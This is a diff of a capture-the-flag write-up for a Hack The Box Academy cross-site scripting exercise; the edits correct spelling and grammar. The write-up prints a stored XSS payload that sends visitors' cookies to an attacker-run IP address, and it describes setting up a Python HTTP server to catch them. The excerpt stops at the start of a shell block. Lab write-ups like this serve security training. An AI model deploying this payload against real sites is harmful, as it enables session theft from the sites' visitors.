DjikstraCS/CTF-Write-Ups/Hack The box/Academy/Cross-Site Scripting (XSS).md

 The web field is vulnerable.

-We can store a malicious payload on the page in the form of a blog post, whenever somone visits the page, their browser will execute the payload and send us their cookie.
+We can store a malicious payload on the page in the form of a blog post, whenever someone visits the page, their browser will execute the payload and send us their cookie.

 We will grab almost the same payload as in the previous question.

 Payload: `hax><script>new Image().src='http://10.10.15.133/index.php?c='+document.cookie</script>`

-Then, set up a HTTP server with Python so we can catch the victims cookie when the page is visited.
+Then, set up an HTTP server with Python, so we can catch the victim's cookie when the page is visited.

 ```bash
 ┌──(kali㉿kali)-[~/tmp]